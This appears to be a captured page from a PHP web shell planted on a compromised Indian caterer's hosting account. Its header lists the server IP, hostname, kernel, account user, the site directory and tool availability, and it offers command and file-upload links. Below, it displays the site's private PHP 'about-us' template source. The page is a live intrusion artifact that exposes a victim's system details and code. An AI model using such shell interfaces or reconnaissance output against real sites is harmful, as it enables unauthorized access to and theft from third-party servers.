Server IP : 103.53.40.154 / Your IP : 3.145.76.159 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/pccaterers.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php $contentAbout=substr(db_scalar("select site_pages_description from tbl_site_pages where 1 and site_pages_link='about-us'"),0,800); $imgAbout=db_scalar("select site_pages_image_name from tbl_site_pages where 1 and site_pages_link='about-us'"); ?> <?php if($contentAbout!="" || $imgAbout!=""){?> <!-- about-area start --> <section class="about-area ptb-140"> <div class="container"> <div class="row"> <?php if($imgAbout!=""){?> <div class="col-md-5 col-xs-12 wow fadeInLeft"> <div class="about-img"> <img src="<?=$site_url?>/static_files/<?=$imgAbout?>" alt="<?=$compDATA['admin_company_name']?>" title="<?=$compDATA['admin_company_name']?>" class="abt-home1"/> </div> </div> <?php }?> <div class="<?php if($imgAbout!=""){?>col-md-7<?php }else{?> col-md-12 <?php }?> col-xs-12 wow fadeInRight"> <div class="about-wrap abt-home"> <h2>Welcome to <?=$compDATA['admin_company_name']?>...</h2> <p><?=$contentAbout?> </p> <a href="<?=$site_url?>/about-us.html" class="rd-mr">Read More</a> </div> </div> </div> </div> </section> <?php } ?> <!-- about-area end -->